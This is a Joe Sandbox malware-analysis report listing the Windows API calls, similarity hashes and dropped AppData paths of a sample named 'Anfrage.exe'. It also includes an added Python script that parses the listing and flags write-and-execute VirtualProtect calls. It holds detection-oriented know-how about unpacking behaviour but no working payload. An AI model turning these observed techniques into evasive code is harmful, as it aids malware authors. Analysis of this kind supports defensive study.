• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: 0c403ca9e670ca7d91bfe0ece00723349c72c8e04d61ed265d5033cb5576c277
• Instruction ID: 835d7e161f894c1f3c63ad3b4a4a0fef325150ad5848be7be1b76146568c1c9e
• Opcode Fuzzy Hash: 0c403ca9e670ca7d91bfe0ece00723349c72c8e04d61ed265d5033cb5576c277
• Instruction Fuzzy Hash: 9EE04F31B001246BD7307AB10F8E97F10999BC4304B39153EBA01B62C6EDBC4C414AB9
APIs
• SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: PathSearch
• String ID:
• API String ID: 2203818243-0
• Opcode ID: b870edbfbee029a9ad95b8ba954cad8e8ca6e667ef8ccb932940172cb277afcb
• Instruction ID: ffb32fe50564557a3c315a30f6fc07dc6475dfcf7bd80787db6a7ea0a2c14a15
• Opcode Fuzzy Hash: b870edbfbee029a9ad95b8ba954cad8e8ca6e667ef8ccb932940172cb277afcb
• Instruction Fuzzy Hash: B2E020B1304111ABD710DF54DE48EAB3B58DF10368F30413AF151F60C0D5FA5945A738
APIs
• RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 72d4a8390eeea65c1ae52196c94098a904bafdf16ab8cb809bd630a83faab224
• Instruction ID: 602783241e3b5571dba8f65d987ce24de14800ae8f8c1c2312d958f7963b7942
• Opcode Fuzzy Hash: 72d4a8390eeea65c1ae52196c94098a904bafdf16ab8cb809bd630a83faab224
• Instruction Fuzzy Hash: 4EE04F76250108BADB00EFA4EE46F9537ECE744700F008435B608E61A1C674E5408B68
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040310E,00000000,00415420,000000FF,00415420,000000FF,000000FF,00000004,00000000), ref: 00405AF1
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 84c91d76a83be332908af776156b545b11287c12e2770689e8b3db02ea887268
• Instruction ID: 1ed90d873f298f356d36a2c1dae4bb172ade26fd4588ec9ef5a2339dc9f33d8e
• Opcode Fuzzy Hash: 84c91d76a83be332908af776156b545b11287c12e2770689e8b3db02ea887268
• Instruction Fuzzy Hash: 11E0EC3221425AABDF609E65DC04AEB7B7CFB05360F014436F925E6190D631F821DFA5
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403158,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405AC2
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 7a5894fcc52b5b75c83558307916cd1b307e449aca39369e2409f4e78c5f9a6a
• Instruction ID: e0af876c1f8b3f6a8543b45de02fe6ba5ae560271bae9c5b6a9092efc5817470
• Opcode Fuzzy Hash: 7a5894fcc52b5b75c83558307916cd1b307e449aca39369e2409f4e78c5f9a6a
• Instruction Fuzzy Hash: FCE0463220029AABCF10AE509C40AAB3B6CEB00261F104832B916E3080E2B0E8209FA4
APIs
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
Memory Dump Source
• Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
• Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
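The VirtualProtect record above is the one worth a second look: the module at image base 10000000 asks for protection 00000040, which is PAGE_EXECUTE_READWRITE, on 1000404C, an address inside its own image. Triaging a long listing like this by hand is slow, so the following Python script is added here as a worked example; it is not Joe Sandbox code and not part of the report. It parses the "APIs" reference lines and the "Offset:" of each record's "Source File" line in the format used on this page, groups the called API names by image base, and flags every VirtualProtect whose requested protection grants both write and execute. The sample input is copied from this page's records. Because the listing does not give SizeOfImage, the 1 MiB window used to decide whether the target lies inside the caller's own image is an assumption.

```python
"""Triage helper for the per-function records of a Joe Sandbox IDA-plugin
listing (added example; not Joe Sandbox code). It parses each record's
'APIs' lines and the image base from its 'Source File' line, groups the
API names by image base, and flags VirtualProtect calls that request a
write+execute protection, the precondition for running freshly written code."""
import re
from dataclasses import dataclass
from typing import Optional

# Documented Windows memory-protection constants (winnt.h).
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WX_MASK = PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
PROTECT_NAMES = {PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
                 PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY"}
# Assumption: the listing gives no SizeOfImage, so "inside the caller's own
# image" is taken to mean within 1 MiB above the record's image base.
IMAGE_WINDOW = 0x100000

# "• Name.Module(arg,arg,...), ref: ADDR" or
# "• Part of subcall function ADDR: Name.Module ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# "• Source File: <dump>.sdmp, Offset: 00400000, based on PE: true"
BASE_RE = re.compile(r"Source File:.*?,\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                      # int per argument, None where the sandbox logged "?"
    ref: int                        # address of the call instruction
    image_base: Optional[int] = None
    subcall_of: Optional[int] = None


@dataclass
class Finding:
    ref: int
    address: Optional[int]
    protect: int
    in_own_image: bool


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)             # also accepts signed forms such as -1000404B


def parse_report(text: str) -> list:
    """API lines precede the 'Memory Dump Source' of their record, so calls are
    buffered until the Source File line supplies the image base."""
    calls, pending = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            pending.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                   subcall_of=int(m["sub"], 16) if m["sub"] else None))
            continue
        b = BASE_RE.search(line)
        if b:
            for c in pending:
                c.image_base = int(b["base"], 16)
            calls.extend(pending)
            pending = []
    calls.extend(pending)            # record cut off before its Source File line
    return calls


def apis_by_module(calls: list) -> dict:
    out = {}
    for c in calls:
        out.setdefault(c.image_base, set()).add(c.name)
    return out


def flag_wx_protect(calls: list) -> list:
    """VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect): flag any
    call whose flNewProtect grants both write and execute."""
    findings = []
    for c in calls:
        if c.name != "VirtualProtect" or len(c.args) < 3 or c.args[2] is None:
            continue
        if c.args[2] & WX_MASK:
            addr = c.args[0]
            inside = (addr is not None and c.image_base is not None
                      and c.image_base <= addr < c.image_base + IMAGE_WINDOW)
            findings.append(Finding(c.ref, addr, c.args[2], inside))
    return findings


# Records copied from this report page (three functions, two image bases).
SAMPLE = """\
APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
  • Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
Memory Dump Source
• Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
APIs
• GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
Memory Dump Source
• Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
"""


def hx(v: Optional[int]) -> str:
    return f"{v:#010x}" if v is not None else "?"


if __name__ == "__main__":
    calls = parse_report(SAMPLE)
    for base, names in sorted(apis_by_module(calls).items(), key=lambda kv: kv[0] or -1):
        print(f"image {hx(base)}: {', '.join(sorted(names))}")
    for f in flag_wx_protect(calls):
        where = " inside the caller's own image" if f.in_own_image else ""
        print(f"[!] {hx(f.ref)}: VirtualProtect({hx(f.address)}, "
              f"{PROTECT_NAMES.get(f.protect, hex(f.protect))}){where}")
```

Run against the full listing, the grouping step separates the file, registry and INI calls of the module at 00400000 from the allocation and protection calls of the module at 10000000, and the flag step reduces the VirtualProtect entries to the ones that matter for unpacking or in-image patching.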
APIs
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2311168178740a320a7838dbc888e64bfba08100527ad66c07f3f89ca227bd51
• Instruction ID: e24d852e2ad3a8f86fdc323a2a6250be89694c15614e2f118570afc755bb50f4
• Opcode Fuzzy Hash: 2311168178740a320a7838dbc888e64bfba08100527ad66c07f3f89ca227bd51
• Instruction Fuzzy Hash: 4DD05B72704115D7CB10EBE5EF0869D77B09B50364F304137D251F31D0D6BACA559729
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,?), ref: 00403169
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
• Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                          APIs
                                                                          • SendMessageA.USER32(00000028,?,00000001,00403E0E), ref: 00403FEB
                                                                          Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
Memory Dump Source
• Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405179
• GetDlgItem.USER32(?,000003EE), ref: 00405188
• GetClientRect.USER32(?,?), ref: 004051C5
• GetSystemMetrics.USER32(00000002), ref: 004051CC
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051ED
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051FE
• SendMessageA.USER32(?,00001001,00000000,?), ref: 00405211
• SendMessageA.USER32(?,00001026,00000000,?), ref: 0040521F
• SendMessageA.USER32(?,00001024,00000000,?), ref: 00405232
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405254
• ShowWindow.USER32(?,00000008), ref: 00405268
• GetDlgItem.USER32(?,000003EC), ref: 00405289
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405299
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B2
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052BE
• GetDlgItem.USER32(?,000003F8), ref: 00405197
  • Part of subcall function 00403FDD: SendMessageA.USER32(00000028,?,00000001,00403E0E), ref: 00403FEB
• GetDlgItem.USER32(?,000003EC), ref: 004052DA
• CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052E8
• CloseHandle.KERNEL32(00000000), ref: 004052EF
• ShowWindow.USER32(00000000), ref: 00405312
• ShowWindow.USER32(?,00000008), ref: 00405319
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405393
• CreatePopupMenu.USER32 ref: 004053A4
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053B9
• GetWindowRect.USER32(?,000000FF), ref: 004053D9
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053F2
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040542E
• OpenClipboard.USER32(00000000), ref: 0040543E
• EmptyClipboard.USER32 ref: 00405444
• GlobalAlloc.KERNEL32(00000042,?), ref: 0040544D
• GlobalLock.KERNEL32(00000000), ref: 00405457
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546B
• GlobalUnlock.KERNEL32(00000000), ref: 00405484
• SetClipboardData.USER32(00000001,00000000), ref: 0040548F
• CloseClipboard.USER32 ref: 00405495
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID:
• API String ID: 590372296-0
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404435
• SetWindowTextA.USER32(00000000,?), ref: 0040445F
• SHBrowseForFolderA.SHELL32(?,00429C40,?), ref: 00404510
• CoTaskMemFree.OLE32(00000000), ref: 0040451B
• lstrcmpiA.KERNEL32(Call,0042A868), ref: 0040454D
• lstrcatA.KERNEL32(?,Call), ref: 00404559
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040456B
  • Part of subcall function 0040559D: GetDlgItemTextA.USER32(?,?,00000400,004045A2), ref: 004055B0
  • Part of subcall function 0040602E: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406086
  • Part of subcall function 0040602E: CharNextA.USER32(?,?,?,00000000), ref: 00406093
  • Part of subcall function 0040602E: CharNextA.USER32(?,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406098
  • Part of subcall function 0040602E: CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 004060A8
• GetDiskFreeSpaceA.KERNEL32(00429838,?,?,0000040F,?,00429838,00429838,?,00000001,00429838,?,?,000003FB,?), ref: 00404629
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404644
  • Part of subcall function 0040479D: lstrlenA.KERNEL32(0042A868,0042A868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046B8,000000DF,00000000,00000400,?), ref: 0040483B
  • Part of subcall function 0040479D: wsprintfA.USER32 ref: 00404843
  • Part of subcall function 0040479D: SetDlgItemTextA.USER32(?,0042A868), ref: 00404856
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A$C:\Users\user\AppData\Roaming\secretaryships$Call
• API String ID: 2624150263-1607129744
APIs
  • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
• GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
• lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
• lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
• GlobalFree.KERNEL32(00000000), ref: 10001BCC
• GlobalFree.KERNEL32(?), ref: 10001CC4
• GlobalFree.KERNEL32(?), ref: 10001CC9
• GlobalFree.KERNEL32(?), ref: 10001CCE
• GlobalFree.KERNEL32(00000000), ref: 10001E76
• lstrcpyA.KERNEL32(?,?), ref: 10001FCA
Memory Dump Source
• Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
APIs
• CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
Strings
• C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic, xrefs: 0040218C
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic
• API String ID: 123533781-3139010620
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
